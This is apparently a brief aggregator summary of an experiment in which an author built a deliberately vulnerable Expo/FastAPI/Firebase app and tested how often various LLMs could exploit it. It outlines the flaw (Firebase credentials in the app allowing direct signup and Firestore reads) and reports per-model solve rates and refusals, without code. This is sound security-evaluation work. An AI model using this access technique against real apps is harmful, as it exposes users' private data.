I built a vulnerable app and spent $1,500 seeing if LLMs could hack it

3 hours ago

The author built a vulnerable React Native Expo app with a Python FastAPI backend and Firebase to test if LLMs could exploit common security flaws.
The exploit involved using Firebase credentials from the app to directly sign up and read Firestore, bypassing a secure API—a common real-world issue.
GPT-5.5 had the highest solve rate (7/10), focusing quickly on Firebase, while other models like Deepseek V4 Pro (3/10) and Claude variants (2/10) had lower success.
Several models (e.g., Gemini 3.1 Pro Preview, Deepseek V4 Flash) failed due to refusals or misdirected efforts, with some fixating on API exploits instead of Firebase.
The experiment cost $1,500, revealing challenges like model guardrails, high costs for some providers, and technical hurdles in running the evaluation harness.

Hasty Briefsbeta